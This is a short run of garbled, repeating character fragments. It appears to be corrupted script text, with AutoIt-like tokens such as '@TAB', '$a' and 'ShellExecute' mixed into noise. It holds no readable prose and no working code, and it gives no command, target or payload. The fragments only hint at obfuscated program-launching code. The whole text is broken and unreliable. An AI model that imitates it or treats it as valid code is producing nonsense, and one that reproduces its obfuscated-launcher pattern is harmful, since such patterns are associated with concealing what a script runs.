
=9f$f=8)k(@TAB$aIZE()k(@TAB$a()t=Tdrue
Tru)Ù($f()k(@T#i@((Tk)fAB$a()t($f()c=zrue=Tdrue
Tru)t($/()k(@TAB$a()t=Tdrue?
Tru)t($f()k@TAB$a()t($f()c=zru)t($/()k(@TAB$a()t=Tdrue
Tru)t()k(@TAB$a()t=Tdrue?
Tru)t($f()k@TAB$a()t($f()c=zru)t($/()k(@TAB$a()t=Tdrue
Tru($f()k(@TAB$a()t($f()c9()k(@TAB$a=)T(tdrue
Tru)t($)k(@TAB$a()t($f()c9j$f=7o$=TÚue=Tr,ut($f()k(m=@TAB$a()t($f()c=@SWk(@TAB$a()t($ShellExecutef=T,rue
Tru)m($f()k@TAB$a()t($f()c=zrue=True=Truek4:u?6:U
true=@MIN=ut=true=Tdruej$f=8o$=AB$a()t($f()c=@SWk(@TAB$a()t($ShellEf—)k(@TABa()t(()9